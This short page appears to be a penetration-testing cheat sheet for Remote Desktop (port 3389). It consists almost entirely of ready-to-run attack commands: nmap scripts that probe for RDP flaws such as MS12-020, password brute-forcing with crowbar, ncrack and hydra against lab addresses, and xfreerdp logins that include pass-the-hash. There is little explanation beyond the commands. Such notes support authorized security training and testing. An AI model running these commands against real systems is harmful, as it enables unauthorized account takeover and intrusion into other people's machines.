Skip to content

3389 - Pentesting rdp

nmap

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 -Pn <IP>

bruteforce - crowbar

crowbar --server 10.11.1.7/32 -b rdp -u pedro -C /usr/share/nmap/nselib/data/passwords.lst -vv

crowbar --server 10.11.1.7/32 -b rdp -U /usr/share/nmap/nselib/data/usernames.lst -C /usr/share/nmap/nselib/data/passwords.lst -vv

bruteforce - ncrack

ncrack -vv --user pedro -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.7

ncrack -vv -U user.txt -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.7

bruteforce - hydra

hydra -V -f -l pedro -P /usr/share/nmap/nselib/data/passwords.lst rdp://10.11.1.7

hydra -V -f -L /usr/share/nmap/nselib/data/usernames.lst -P /usr/share/nmap/nselib/data/passwords.lst rdp://10.11.1.7

Connect with known credentials/hash

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>

xfreerdp /u:admin /p:123456  /cert:ignore /v:10.11.1.7 /w:2000 /h:900